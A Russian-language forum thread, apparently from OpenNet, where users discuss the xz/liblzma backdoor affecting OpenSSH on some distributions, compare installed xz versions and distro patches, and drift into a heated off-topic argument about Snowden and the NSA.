    И фарфоровый чайник на орбите летает, да ... текст свёрнут, показать
     
  • 6.84, Аноним (84), 04:05, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +5 +/
    >Linux Kernel обгоняет винду десятку на 796 CVE

    Абсолютно "кривая" логика.
    Если сравнивать *конкретную* версию винды (Win10), то надо брать *конкретную* версию ядра, например 4.19.х, выпущенную примерно одновременно с 10-кой. А если хочешь сравнить колличество CVE для всех Linux Kernel, то и для винды надо считать CVE для всех, начиная с Win95.
    ИМХО так будет корректно.

     
     
  • 7.120, Анонин (-), 09:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Абсолютно "кривая" логика.

    Сравнивать только ядро с полноценной операционной системой.
    Нужно брать конкретную десктоп версию дистрибутива, например Дебиан или Федора.
    И суммировать все CVE в софте, который идет из коробки и без которого он неюзабелен.
    Потому что в список винды попадает всякая фигня вроде Windows Contacts и Windows Fax Compose Form.
    А в список ядра даже уязвимости в иксах/вейланде не попадают.

    ИМХО так будет корректно.

     
  • 4.38, Аноним (38), 00:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    "Предполагаемый автор бэкдора" и у MS отметился
    https://learn.microsoft.com/en-US/cpp/overview/whats-new-cpp-docs?view=msvc-17
     
     
  • 5.77, birdie (ok), 01:57, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ужасы.

    С этого момента все его коммиты за последние пару лет раз 10 будут проверять :-)

     
     
  • 6.116, ss (??), 09:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    "история про неусыпное око миллионов наблюдающее за исходным кодом 2.0"
     
  • 4.172, Jh (?), 11:18, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Да вся винда бэкдор для МС. Хотят качают телеметрию от пользователя, хотят ставят рекламу в меню пуск пользователю. Сделать на твоей системе они могут что угодно.
     
  • 4.217, Аноним (84), 12:20, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >Примеры backdoors в продуктах Microsoft в студию. Хотя бы один за 40 с лишним лет

    Как-то утек в открытый доступ сервис пак для NT с неудаленными отладочными символами. Там некоторые ключи назывались NSA_key. Не бекдор, конечно..

     
  • 4.412, Аноним (-), 01:08, 04/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Примеры backdoors в продуктах Microsoft в студию. Хотя бы один за 40 с лишним лет,
    > что они существуют.

    Всякие ремотные активации с "customer experience improvement" с отсылкой нажатий кнопок на клаве интеречно что по вашему? Фича чтоли? Ну тогда кардер разувающий вашу кредитку - благодетель, вероятно. А грабитель - так и вообще клевый чувак.

     
  • 3.68, Аноним (68), 01:39, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, ядро же оно само по себе существует, ему же вообще ничего не нужно. Прикладное ПО? Зачем оно пользователям линукса?


    А пока остаётся только ставить линукс и приговаривать: "This is fine"

     
     
  • 4.413, Аноним (-), 01:10, 04/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > А пока остаётся только ставить линукс и приговаривать: "This is fine"

    Ну так в стабильных дистро - "all systems online". Ну в васяны с роллингами как раз и побегали по минному полю - а они разве не на это подписывались? :)

     
  • 2.23, твёрдый ветер (?), 23:48, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >В то время как крупные корпорации, такие как Microsoft, Google или Apple, одобряют каждую строчку кода, которая попадает к вам как к клиенту

    можно поподробнее о том как крупные корпорации одобряют каждую строчку кода ?

     
     
  • 3.118, ss (??), 09:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Джобс считал что так надо делать. Как там сейчас - хз
     
  • 2.100, Bonbon (?), 08:04, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    К вопросу о RHEL 1 We built 5 6 0 for Fedora 40 41 Jia Tan was very insis... большой текст свёрнут, показать
     
     
  • 3.168, Аноним (40), 11:14, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Что интересно, в светлой голове мейнтейнера даже мысли не возникло, почему ПРИКЛАДНОЙ код написан так, что верификаторы ругаются на всякие низкоуровневые ifuncs. Даже если бы они там были реально нужны - этот говнокодинг ушёл бы в продакшн без возражений, я так понимаю?
     
  • 2.117, Аноним (117), 09:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ага, наивный Работал я в крупных компаниях Строчки там одобряют неглядя за ред... большой текст свёрнут, показать
     
     
  • 3.199, ProfessorNavigator (ok), 11:46, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Решаемая, просто для начала её стоит правильно сформулировать Правильная же, на... большой текст свёрнут, показать
     
     
  • 4.386, Аноним (386), 23:04, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    gt оверквотинг удален хорошая попытка, но нет ... большой текст свёрнут, показать
     
     
  • 5.388, ProfessorNavigator (ok), 00:30, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > хорошая попытка, но нет.

    Что именно и почему?

     
  • 2.211, Аноним (211), 12:04, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Cisco достаточно крупная корпорация? Все же помним доступ по curl? А исправление бекдора в виде запрета доступа по... юзерагенту curl?
     
  • 2.241, Аноним (121), 13:07, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Тем временем https overclockers ru blog Docent2006 show 20835 v_routerah_cisco... большой текст свёрнут, показать
     
     
  • 3.288, Аноним (288), 15:26, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вы прекрасно нарыли дыры у networking equipment vendor. Прекрасно.

    Но какое Cisco имеет отношение к компаниям, которые перечислил птичка?

    Даже если переставить буквы, Cisco не получится. Увы.

     
     
  • 4.305, Аноним (121), 16:07, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Но какое Cisco имеет отношение к компаниям, которые перечислил птичка?

    А если прочесть его сообщение внимательней?

    > В то время как крупные корпорации, такие как

    Cisco разве перестала быть корпорацией, с проприетарной продукцией?

     
     
  • 5.363, Аноним (363), 12:43, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Гнутое точно такая же проприетарщина потому что требует передачи авторских прав, но ведь это не считается? Я про www.gnu.org/licenses/why-assign.ru.html говорю.
     
  • 2.248, Аноним (248), 13:15, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Я уже много лет говорю [...] Я знал
    > В то время как крупные корпорации, такие как Microsoft, Google или Apple, одобряют каждую строчку кода, которая попадает к вам как к клиенту

    Ох, лол. Чел, ты же, очевидно, в коммерческой разработке никогда не участвовал. Откуда у тебя при этом столько спеси?

     
     
  • 3.289, Аноним (288), 15:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >> Я уже много лет говорю [...] Я знал
    >> В то время как крупные корпорации, такие как Microsoft, Google или Apple, одобряют каждую строчку кода, которая попадает к вам как к клиенту
    > Ох, лол. Чел, ты же, очевидно, в коммерческой разработке никогда не участвовал.
    > Откуда у тебя при этом столько спеси?

    Давно/много работаете в указанных выше компаниях или ваша "коммерческая разработка" ограничена шаражкой на 200 человек от силы?

     
  • 2.252, Anonimous (?), 13:22, 30/03/2024 Скрыто ботом-модератором     [к модератору]
  • +2 +/
     
     
  • 3.287, birdie (ok), 15:24, 30/03/2024 Скрыто ботом-модератором     [к модератору]
  • +/
     

     ....ответы скрыты (65)

  • 1.12, Ано ним (?), 23:17, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    > сервер OpenSSH, в котором используется liblzma

    Это не правда. В sshd не используется liblzma. SSHd _можно_ собрать, слинковав с libsystemd, который в свою очередь, зависит от liblzma. Читайте оригинал сообщения https://www.openwall.com/lists/oss-security/2024/03/29/4

     
     
  • 2.17, birdie (ok), 23:29, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • –5 +/
    sshd дёргает метод из systemd, который дёргает liblzma.

    То, что вы в своём Gentoo/LFS/Devuan извращаетесь, не имеет отношения к новости.

    Она про Fedora 40/Rawhide/Debian SID, и they are all f*cked.

     
     
  • 3.30, Аноним (30), 00:10, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +8 +/
    Учитывая, что разрабатывают openssh разработчики openbsd, то вопрос кто тут извращается с libsystemd, остаётся открытым
     
  • 3.43, Аноним (43), 00:34, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +14 +/
    Нету в проекте openssh никаких обращений к libsystemd и тем более "методов".

    Умники-разумники из популярных дистро вместо того, чтобы самим реализовать достаточную часть протокола — вызвать getenv("NOTIFY_SOCKET"), открыть указанный там сокет, написать туда в нужный момент 8 байт ("READY=1\n"), закрыть сокет и вызвать unsetenv() — решили слинковаться с libsystemd ради одной функции, совершающей вышеперечисленные шаги, и притащили в адресное пространство вагон зависимостей этой libsystemd вроде libcurl, liblzma, libmount и ещё десятка чего-то там. Этим бекдор и пользуется, вмешиваясь в работу dynamic linker, о чём довольно подробно написано в рассылке oss-security.

    Умник №1: https://salsa.debian.org/ssh-team/openssh/-/commit/59d17e9085676c56eeb57d66446
    Умник №2: https://src.fedoraproject.org/rpms/openssh/blob/176421c4e42b13b3e1475746153895

    Функция sd_notify() не дёргает liblzma, для бекдора этого не надо. Т. н. "systemd notifications" можно реализовать без libsystemd, и этот протокол применяется не только в systemd (ещё в QEMU).

    Извращение добавили те дистро, что впатчили сборку с libsystemd. Прежде чем писать, сначала лучше проверяйте сведения.

     
     
  • 4.106, Аноним (106), 08:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Ты всё юлишь, но не хочешь сказать правду, что systemd и есть бекдор. Всё об этом знали уже очень давно, но нмкто не хочет признавать.
     
     
  • 5.332, namenotfound (?), 21:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    да-да, власти скрывают, голуби следят

     
  • 3.58, Аноним (40), 01:06, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > То, что вы в своём Gentoo/LFS/Devuan извращаетесь, не имеет отношения к новости.

    Красиво подгорает! Перечитываю снова и снова, не могу налюбоваться!

     
  • 3.108, Аноним (98), 08:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Gentoo: "Newer releases were signed by a potentially compromised upstream maintainer"!
    Забанили все релизы подписанные этим автором:
    https://packages.gentoo.org/packages/app-arch/xz-utils
     
     
  • 4.114, сщта (?), 09:23, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Системд нет,екзедутилс 5.4.6-r1. Все норм.Бггг.
     
     
  • 5.122, сщта (?), 09:45, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Кажется откатывается на 5.4.2
     
  • 2.53, Ivan_83 (ok), 00:50, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Тоже не понимал причём тут xz, пришлось читать оригинал:

    > openssh does not directly use liblzma. However debian and several other
    > distributions patch openssh to support systemd notification, and libsystemd
    > does depend on lzma.

     
     
  • 3.239, НяшМяш (ok), 13:01, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Тот самый момент, когда арч лучше дебиана.
     
     
  • 4.380, Аноним (380), 18:58, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    buster - 5.2.4
     

  • 1.16, Аноним (15), 23:29, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    Вообще xz это зло: https://www.nongnu.org/lzip/xz_inadequate.html
     
     
  • 2.41, Аноним (40), 00:34, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А что насчёт zstd? Бяка типа xz или что-то приятное типа gz/lz? Есть информация?
     
     
  • 3.82, Bklrexte (ok), 03:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    У lz4 и zstd один и тот же автор, так что скорее приятное.
     
  • 3.233, майнеймис (?), 12:53, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    стоящая вещь, только софт некоторый отсталый, а всякие mc вообще не могут без тарбола распаковать. тарболы зло, т.к. при открытии приходится все прогружать ради одного файлика из архива или просмотра списка.
     
  • 2.42, Аноним (42), 00:34, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Слишком много букв. А что они там предлагают для long-term archiving?
     
     
  • 3.55, Аноним (18), 01:04, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ничего конкретного.

    Но вообще любой шарящий в теме человек знает, что для действительно длительного и надежного хранения данных нужна избыточность. То есть желательно использовать что-то типа Parchive.

     
  • 3.62, Аноним (40), 01:21, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Они говорят, что gzip, bzip2 и lzip "в разы" лучше в плане детекта различного рода проблем, появляющихся в архивах со временем, чем xz (детект ошибок в битых архивах и прочее подобное).
     
  • 3.258, й (?), 13:29, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ленту.

    В трех экземплярах.

     

  • 1.22, Аноним (28), 23:47, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +6 +/
    Gentoo проблема с sshd не аффектит, так как там не используют патчи для systemd-notify: https://bugs.gentoo.org/show_bug.cgi?id=CVE-2024-3094#c3
     
     
  • 2.407, burjui (ok), 22:34, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Gentoo трабл с sshd не аффектит, так как там не юзаются патчи для systemd-notify

    Пофиксил, ё велком

     

  • 1.29, Аноним (33), 00:07, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.

    xz --version
    xz (XZ Utils) 5.4.1
    liblzma 5.4.1

    Хакеры 0 : 1 Debian stable

     
     
  • 2.35, Skullnet (ok), 00:25, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    xz --version
    xz (XZ Utils) 5.2.5
    liblzma 5.2.5

    У меня ещё древнее.

     
     
  • 3.48, Аноним (48), 00:40, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А вот у тебя 4 летняя, но сидеть на старостабильной ветке и не ставить на неё обновления старостабильной ветки тоже аутизм
     
     
  • 4.65, Skullnet (ok), 01:30, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > А вот у тебя 4 летняя, но сидеть на старостабильной ветке и
    > не ставить на неё обновления старостабильной ветки тоже аутизм

    У меня самый свежий Linux Mint вообще-то.

     
     
  • 5.221, Аноним (221), 12:33, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Основанный на покрывшейся плесенью Ubuntu 22.04 LTS. Ничего, в этом году должен выйти новый LTS выпуск.
     
     
  • 6.283, Аноним (281), 14:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Псс, Ubuntu 22.04.4 LTS вышел достаточно недавно и софты в нём достаточно свежие. А главное всё работает. Новый LTS до первых фиксиков вообще лучше палкой не трогать будет. Надо сказать санитарам, что ты опять обделался
     
  • 2.46, Аноним (48), 00:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Все версии за 2 года содержат код этого автора, у тебя слишком сырая версия.
     
  • 2.86, Аноним (86), 04:08, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Угу.

    > He has been part of the xz project for 2 years, adding all sorts of binary test files, and to be honest with this level of sophistication I would be suspicious of even older versions of xz until proven otherwise.
    > Debian is currently looking into downgrading it even further, before the first contribution from the known bad actor, which may be an older 5.2 release (later ones were also cut by them), then reapplying only the security fixes that came later on top manually, for now.

    OpenNet: "Я в безопасности, меня не касается, проблемы нет!!"

     

  • 1.32, Аноним (30), 00:15, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В pkgsrc уже откатились - https://pkgsrc.se/archivers/xz

    Но в самом образе NetBSD вообще 5.2.4 версия

     
     
  • 2.385, Аноним (385), 22:59, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >[ ! $(uname) = "Linux" ] && exit 0

    так BSD и так в безопасносте

     

  • 1.34, Аноним (34), 00:20, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +21 +/
    Чувак не виноват, ему просто copilot сделал автоподстановку и он случайно нажал на Tab
     
     
  • 2.95, Аноним (95), 07:40, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да да, приходиш в жкх, а почему вы мне так много начислили? А это не мы, это программа так сделала ;)
     
     
  • 3.208, Аноним (248), 12:00, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Шутки шутками, но такое реально бывало:

    https://en.m.wikipedia.org/wiki/British_Post_Office_scandal

     

  • 1.39, Аноним (-), 00:32, 30/03/2024 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +/
     
  • 1.44, birdie (ok), 00:36, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Всё ещё веселей: https://github.com/google/oss-fuzz/issues/11760#issuecomment-2027602656
     
     
  • 2.250, Аноним (248), 13:15, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Погоди-ка, но ты же выше писал, что Google проверят каждую строчку кода? Как же так вышло-то?

    https://github.com/google/oss-fuzz/pull/10667#pullrequestreview-1518981986

     

  • 1.47, Аноним (47), 00:39, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    fedora
    $ xz --version
    xz (XZ Utils) 5.4.4
    liblzma 5.4.4

    ubuntu
    $ xz --version
    xz (XZ Utils) 5.2.5
    liblzma 5.2.5

    debian
    $ xz --version
    xz (XZ Utils) 5.4.1
    liblzma 5.4.1

    Фух. Пронесло =)

     
  • 1.49, Аноним (42), 00:41, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.

    Ну, ладно.

    > https://security.archlinux.org/ASA-202403-1

    А эти пишут, что "The problem has been fixed upstream in version 5.6.1."

     
     
  • 2.54, Аноним (40), 00:55, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    "Эти" рекомендуют ставить не просто 5.6.1, а 5.6.1-2 , в которой бинарник собирается из архива, взятого непосредственно с гитхаба, а не из официального источника. Судя по новости, этот бинарник без проблем. См. https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/88138575
     
     
  • 3.60, Fyjy (-), 01:16, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Я буду громко смеяться, если в "пофикшенном" бинарнике будет второй бекдор, но более качественный.
    Напоминает плохо спрятанный мелкий косяк, который естественно находится, а потом начинаются торги, извинения и заглаживания вины.
    Хотя сейчас вообще непонятно откуда код более проверенный.
     
     
  • 4.63, Аноним (40), 01:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    В принципе вы правы. Но тогда уж откатываться на версию двухлетней давности. Интересно, за эти два года там были изменения, которые реально полезны, а не просто "рефакторинг в свободное время"?
     

  • 1.56, Аноним (56), 01:04, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Хорошо, что использую Debian stable, где, как говорят "эксперты", все протухло и он не нужен.
     
     
  • 2.59, Аноним (40), 01:16, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +15 +/
    Хорошо или нет, но именно дебиан (среди прочих) пропатчил исходники openssh таким образом, что sshd стал уязвим. У тех, кто не считает себя умнее разработчиков openssh и не оверпатчит изначальный софт вдоль и поперёк, проблемы нет.
     
  • 2.73, Аноним (18), 01:49, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Да заметили бы, только уже при расследовании реальных взломов. Но автор конечно действительно прокололся на мелочи.
     
  • 2.85, Аноним (86), 04:07, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > He has been part of the xz project for 2 years, adding all sorts of binary test files, and to be honest with this level of sophistication I would be suspicious of even older versions of xz until proven otherwise.
    > Debian is currently looking into downgrading it even further, before the first contribution from the known bad actor, which may be an older 5.2 release (later ones were also cut by them), then reapplying only the security fixes that came later on top manually, for now.

    OpenNet: "Я в безопасности, меня не касается, проблемы нет!!"

     

  • 1.66, Аноним (66), 01:36, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Ну так себе, для любителей всяких current/testing/unstable версий.
    Хорошо что выявили довольно быстро, если бэкдор имел более скрытые особенности могло бы годами так лежать незаметно.
    После такого проекту вообще нельзя больше доверять и надо его исключить из состава топ дистров.
     
     
  • 2.72, Аноним (68), 01:45, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Тут цельное селинукс кровавой црушнёй писано, да не смутит вас ник злыдня "под китайца"...
     
     
  • 3.78, Аноним (66), 02:17, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Матчасть бы изучил, умник.
    Селинукс изобрели в АНБ, и по словам Сноудена они как раз конкурируют с црушниками в плане ИБ.
    У первых цель - безопасность, а у вторых внедрение зондов и шпионаж.
    Но для среднего васяна - все западные агенства это одна большая конспирология.
     
     
  • 4.96, Аноним (68), 07:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Вот и сам изучи матчасть, "безопасность" -- морковка для ослика, а вот поди разгадай как меняется логика функций в зависимости от последовательности данных и условий во времени. Это тебе не васян-троян, это ещё могшие на логическую обфускацию индусы. И слово "безопасности" в названии конторы это не про вашу безопасность.
     
     
  • 5.133, Аноним (125), 10:12, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Тогда почему ты пишешь от Анонима, а не зарегистрировался на форуме по телефону и паспорту, как порядочный гражданин?
     
  • 5.142, Аноним (-), 10:20, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > И слово "безопасности" в названии конторы это не про вашу безопасность.

    Разумеется! Но свою безопасность им тоже нужно как-то организовывать.
    Например от коллег из дружественного Китая и РФ.
    А раз им приходится пользоваться линуксом, который дыряв как носки срочника, то с этим пришлось что-то делать.

     
  • 4.140, Анонм (?), 10:17, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Сноудену безоговорочно верить, себя не уважать.
    Учитывая где он сейчас.
    А то как-то получается, что почти все борцуны за большую свободу, в итоге оказываются с крепкой рукой в заднице от какого-то диктаторского или тоталитарного режима.
     
  • 4.152, n00by (ok), 10:48, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > Матчасть бы изучил, умник.
    > Селинукс изобрели в АНБ, и по словам Сноудена

    Начинаем учить матчасть:
    1. Сноуден, прежде всего, предатель. Кто не понимает, что это значит, утрирую: люди ему поверили, но он их обманул.
    2. Где факты, подтверждающие его компетентность, кроме как "у Эйнштейна тоже был тройбан по физике"?
    3. Могли ли его действия просчитать и подсунуть "куклу" - это вопрос для тех, кто хоть что-то понимает.

     
     
  • 5.159, Аноним (159), 10:56, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Начинаем учить матчасть:
    > 1. Сноуден, прежде всего, предатель

    Кому-то самому не мешало бы поучить матчасть. Сноуден исходит из мнения что службы воюют против собственного народа. А согласно их законам имеют право на восстание. Он помогает чем может. Свой народ по его личному мнению он не продавал.

    > 2. Где факты, подтверждающие его компетентность, кроме как "у Эйнштейна тоже был тройбан по физике"?

    Издание рейтерс пойдет? Комментарий главы АНБ.
    WASHINGTON (Reuters) - Former U.S. National Security Agency contractor Edward Snowden leaked as many as 200,000 classified U.S. documents to the media, according to little-noticed public remarks by the eavesdropping agency's chief late last month.

    Факты компетентности главы АНБ надо приводить?

     
     
  • 6.189, n00by (ok), 11:32, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Действительно, учить, так учить Однокоренные слова к мнение мнить, мнимый М... большой текст свёрнут, показать
     
     
  • 7.200, Аноним (200), 11:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Что же ты юлишь то Очередного задорнова-фоменко косплеишь неубедительно А слов... большой текст свёрнут, показать
     
     
  • 8.262, n00by (ok), 13:33, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Я объясняю тебе смысл слов, поскольку ты сам далёк от понимания своей писанины ... текст свёрнут, показать
     
     
  • 9.270, Аноним (270), 13:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ливнул, как ожидаемо Ни одного своего лживого утверждения не смог обосновать П... текст свёрнут, показать
     
     
  • 10.351, n00by (ok), 08:35, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Уговорил, объясняю вот это за тебя Проекция - механическая псих защита, характе... текст свёрнут, показать
     
     
  • 11.359, Аноним (360), 10:37, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Про 12 приёмов Чапека тебе наверное уже ленивый не писал Успокойся, здесь люди ... большой текст свёрнут, показать
     
     
  • 12.376, n00by (ok), 17:38, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Первый раз такое тут вижу А это постоянно Когда оратор плавает в вопросе, он р... текст свёрнут, показать
     
     
  • 13.382, Аноним (382), 20:57, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Так кто прав Американский суд признавший преступным слежку за своими гражданами... текст свёрнут, показать
     
     
  • 14.395, n00by (ok), 07:47, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем ты задаёшь мне все эти глупые вопросы Ты хочешь меня убедить, что я не пр... текст свёрнут, показать
     
     
  • 15.406, Аноним (360), 18:43, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Прямо эталон по впрыгиванию в жир ногами показал И дальше крутишься как на сков... текст свёрнут, показать
     
     
  • 16.408, n00by (ok), 11:03, 02/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Итак, Анонимный эксперт настойчиво утверждает, что некий окружной суд Жмеринки п... текст свёрнут, показать
     
  • 8.336, TSO (?), 22:59, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    По его разумению, я так понимаю, аглийское слово opinion мение происходит от... текст свёрнут, показать
     
     
  • 9.350, n00by (ok), 08:33, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Некоторым быть в танке недостаточно, в качестве дополнительной защиты прибегают ... текст свёрнут, показать
     
  • 5.160, ОШИБКА Отсутствуют данные в поле Name (?), 10:57, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Не хочешь быть соучастником преступлений, о "необходимости" совершения которых тебя поставили перед фактом = предатель. Вау. Хочу ещё больше таких размышлений.
     
     
  • 6.191, n00by (ok), 11:35, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Не хочешь быть соучастником преступлений, о "необходимости" совершения которых тебя поставили
    > перед фактом = предатель. Вау. Хочу ещё больше таких размышлений.

    Каких преступлений? Он отказался облучать народ марсианскими технологиями, потому что средний американец не носит шапочку из фольги?

     
     
  • 7.205, Аноним (205), 11:58, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ты с мат частью всё-таки ознакомишься может?
    Слежка за любым гражданином без санкций.

    I will be satisfied if the federation of secret law, unequal pardon and irresistible executive powers that rule the world that I love are revealed even for an instant.
    Now increasingly we see that it's happening domestically. And to do that, they, the NSA specifically, targets the communications of everyone.
    Not all analysts have the ability to target everything, but I, sitting at my desk, certainly had the authorities to wiretap anyone, from you or your accountant, to a federal judge, to even the President, if I had a personal email.

     
     
  • 8.266, n00by (ok), 13:39, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Что это за текст, кто его автор и зачем ты мне его отправляешь в ответ Я лучше ... текст свёрнут, показать
     
     
  • 9.268, Аноним (270), 13:46, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ты с матчастью ознакомься Это цитата Сноудена в интервью гуардиану Сбор данных... текст свёрнут, показать
     
     
  • 10.352, n00by (ok), 08:41, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    С какого перепугу я должен верить персонажу, чья компетенция в вопросе никак не ... текст свёрнут, показать
     
     
  • 11.357, Аноним (360), 10:23, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Seven years after former National Security Agency contractor Edward Snowden blew... большой текст свёрнут, показать
     
     
  • 12.377, n00by (ok), 17:41, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    А ты _мне_ вот этим показал, что сам себя лично ни во что не ставишь ... текст свёрнут, показать
     
     
  • 13.383, Аноним (382), 20:58, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Итак кто прав Американский суд признавший преступным слежку за своими гражданам... текст свёрнут, показать
     
     
  • 14.396, n00by (ok), 07:49, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем ты задаёшь мне все эти глупые вопросы Ты хочешь меня убедить, что я не пр... текст свёрнут, показать
     
  • 6.246, Аноним (246), 13:13, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Извините за занудство, но
    1. Сноуден сам пошёл в контору. Взрослый мужчина, не мог не знать, какого рода делами занимается контора. То есть сам изъявил желание поучаствовать.
    2. Сам принял гражданство РФ.

    Поэтому все эти морализаторские аргументы - лицемерие.

     
     
  • 7.264, n00by (ok), 13:35, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Тут кстати некоторые не очень рады, что он принял наше гражданство. Потому что в истории был похожий персонаж, звали его Ли Харви Освальд. Теперь есть опасения, что его обратно выкрадут.
     
     
  • 8.337, TSO (?), 23:02, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Вау, о сколько нам открытий чудных А можно поинтересоваться 8212 какого та... текст свёрнут, показать
     
     
